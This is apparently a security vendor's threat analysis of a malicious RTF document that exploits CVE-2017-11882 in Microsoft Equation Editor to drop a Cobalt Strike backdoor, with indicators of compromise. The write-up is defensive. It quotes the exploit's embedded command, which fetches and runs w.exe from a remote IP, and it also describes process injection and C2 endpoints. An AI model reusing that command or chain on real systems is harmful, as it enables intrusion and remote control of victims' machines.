On November 20, 2017 the exploit for CVE-2017-11882 was publicly released, which allowed for code execution in vulnerable versions of Microsoft’s Equation editor.

CVE-2017-11882 affects the following versions of Microsoft Office:

• Microsoft Office 2007 Service Pack 3
• Microsoft Office 2010 Service Pack 2
• Microsoft Office 2013 Service Pack 1
• Microsoft Office 2016

Microsoft Equation Editor, which is a Microsoft Office component, contains a stack buffer overflow that allows remote code execution on a vulnerable system. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe.

DEP and ASLR should protect against such attacks, however, because of the manner in which eqnedt32.exe was linked, it will not utilize these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to eqnedt32.exe, unless applied system-wide. This provides the attacker with a avenue to lure targets into clicking on a specially crafted documents, resulting in the ability to execute an embedded attacker command.

> In the sample analyzed, ultimately a Cobalt Strike payload was dropped on the compromised system. However as the exploitation of this CVE continues to gain traction, practitioners can expect other families to be used.
>
> The Carbon Black Threat Analysis Unit (TAU) expects this vulnerability to be actively exploited in both spam and spearphishing campaigns, over the next quarter.
>
> The graphic below highlights the overall process, which is detailed in the technical analysis section.

Figure 1: Process Overview

Technical analysis of a sample utilizing CVE-2017-11882 is detailed in the below. The Carbon Black TAU created a separate document for customers, which details how they can utilize Carbon Black products to protect themselves against this type of attack.

Technical Analysis

Malicious Document - Stage One

File Name : Изменения правил осуществления переводов.rtf
File Name 1 : account details.rtf
File Name 2 : news.swift.rtf
File Size : 31,811
CRC32 : c326285e
MD5 : f360d41a0b42b129f7f0c29f98381416
SHA1 : 245b867e578e9df12877df07017338863a5fdc59
SHA256 : 17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c

---

Table 1: Sample metadata

The initial document contains a malicious equation that exploits the CVE-2017-11882 vulnerability. The exploit allows a crafted document to execute a command (with a maximum length of 44 bytes) via a call to the WinExec API. This exploit was released and documented in this post. The command will call cmd.exe to download and execute a payload from a remote system, which is displayed in the table below.

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F

00000940 0A 0A 01 08 5A 5A 63 6D 64 20 2F 63 20 ZZcmd /c
00000950 73 74 61 72 74 20 5C 5C 31 33 38 2E 36 38 2E 32 start \\138.68.2
00000960 33 34 2E 31 32 38 5C 77 5C 77 2E 65 78 65 20 26 34.128\w\w.exe &
00000970 41 41 41 41 41 12 0C 43 AAAAA C

---

Table 2: Embedded Command

It should be noted that the payload in this document matches (with the only differences being the command itself) the object_data template and object_trailer from a Proof of Concept for CVE-2017-11882.

Dropper - Stage Two

Stage two of the attack chain contains a dropper with the final payload as a resource. The dropper is wrapped in a custom packer and then wrapped again in UPX. Once through the packers, the dropper prepares the third stage of the chain by finding it in the binary resource section as C132

Figure 2: Load Resource

Next, the dropper searches for wmplayer.exe in the expected 32 and 64-bit locations.

Figure 3: wmplayer.exe search

Wmplayer.exe is created as a suspended process and the stage three DLL is injected into it and instructed to run. Finally, the dropper executes a command to delete the stage two dropper and exits.

cmd.exe /C Del <path_to_original_dropper>

---

Table 3: Clean up command

Backdoor - Stage Three

The final stage is a Cobalt Backdoor that connects back to the C&C server at:

• https://104.144.207.207
  • /j.ad
  • /submit.php
• User-Agent
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)

This final payload allows the attacker full control over the system. The backdoor is capable of executing arbitrary command from the C2 server as well as injecting additional payloads into memory using the ReflectiveLoader export of the DLL.

Conclusion

Spam campaigns do their best to take advantage of the latest and most modular types of attacks, using the most recent vulnerabilities in order to maximize their effectiveness against the largest amount of targets. The Carbon Black TAU is constantly monitoring the threat landscape in order to provide the community and our customers with the latest trends and IOCs to increase security across the board.

In order to decrease the likelihood of infection, everyone should ensure that the latest security updates are installed and users should not open suspicious documents that they are not expecting.

Indicators

Indicator

|

Type

|

Context

—|—|—

138.68.234.128

|

IP

|

Payload Delivery Server

104.144.207.207

|

IP

|

Command and Control Server

d46df9eacfe7ff75e098942e541d0f18

|

MD5

|

Payload (w.exe)

60656140e2047bd5aef9b0568ea4a2f7c8661a524323111099e49048b27b72c7

|

SHA256

|

Payload (w.exe)

86d739651881c01cfe5ce6867df3025a

|

MD5

|

Cobalt Strike (final) Backdoor

5f777cbad221cb2d89c59ff84ced2fd278d6d220c3cfc13e3fb8e2ca38698e0f

|

SHA256

|

Cobalt Strike (final) Backdoor

The post Threat Analysis: Equation Equals Backdoor appeared first on Carbon Black.